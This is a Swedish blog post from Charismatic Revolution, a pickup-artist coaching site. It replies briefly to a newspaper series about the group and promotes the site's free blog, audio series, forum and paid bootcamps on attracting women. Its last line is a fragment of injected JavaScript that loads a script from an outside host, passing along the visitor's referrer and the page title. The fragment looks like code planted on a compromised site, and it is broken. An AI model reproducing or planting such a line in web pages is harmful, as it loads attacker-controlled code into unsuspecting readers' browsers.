logo1
Hej alla!

Återigen är det verkligen intressant med all uppmärksamhet som vi och vår verksamhet fått de senaste dagarna. Vi får massor av feedback, både uppmuntrande och skeptisk. Personligen tror jag verkligen starkt på det vi gör, hade jag inte gjort det hade inte jag och de andra grabbarna utsatt oss för den massmediala uppmärksamhet som vi nu gjort och fortsättningsvis säkert kommer att ha. Varför vågar vi ställa oss framför journalister och kameror trots vetskapen om att vi lätt kommer att missförstås och vinklas? Dels för att vi inte bryr oss särskilt mycket om vad människor som missförstår vår verksamhet och det vi brinner för tycker, men också för att vi vet att vårt material talar för sig självt när människor tar sig tiden att granska oss närmare.

Därför tänkte jag idag inte göra några större kommentarer till dagens artikel i SvD som är del 2 i deras artikelserie om oss och vår verksamhet. (Del 1 hittar ni här.)

Jag tänkte istället ge en liten rundtur av vår verksamhet och en guide för er som inte varit på sidan förut om var man kan hitta bra information och material som vi gjort och som på ett bra sätt täcker grunderna för det vi lär ut och praktiserar.

En av de grundläggande sakerna är alfakonceptet. Vi har precis lagt upp en heltäckande artikel om alfakonceptet på materialdelen, här hittar du också vår intervju om ”vad det är vi gör” och om game, och allmänhetens syn på det generellt som ligger under titeln ”Annat” längst ned på sidan. Här finner du dessutom de första delarna i vår audioserie som är helt gratis!

Vi tror som jag tidigare sa väldigt starkt på det vi gör, vilket också är anledningen till att de allra flesta delarna av vår verksamhet är fri. Audioserien, bloggen och forumet finns där för alla som vill lära sig mer, utan att betala ett öre!

På vår blogg finns redan hundratals poster om olika delar och aspekter av attraktion, relationer och förhållandet män/kvinnor. Ta dig gärna tiden att läsa igenom bloggen, jag kan särskilt rekommendera vår bloggserie om relationer, serien om horan/madonnan-komplexet, samt vår post om 10 enkla tips du kan använda redan ikväll till att börja med. Det är bara ett smakprov på all fri ”value” som finns i bloggen.

I vår verksamhet ingår också bootcamps som är våra helgkurser där vi praktiskt och teoretiskt lär män att träffa och attrahera kvinnor på ett avslappnat och självsäkert sätt. Vad våra tidigare studenter har sagt om bootcamps går att läsa under reviews, här. Nyligen har vi också satt ihop ett heldagsseminarium som blev bejublat av våra deltagare. På seminariet pratar vi om naturlig attraktion och hur man utvecklas till en naturligt attraktiv och självsäker man. Du kan läsa mer detaljerat om seminariets alla delar och titta på videoutdrag av våra föreläsningar, här.

Det summerar vår korta introduktion av hemsidan, och då har vi inte ens pratat om den oerhörda mängd information och kompetens som finns på forumet! Bli gärna medlem (kostar ingenting) och utvecklas med oss! Välkommen till Charismatic Revolution, vi är glada att ha dig här!

Kram,

- Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;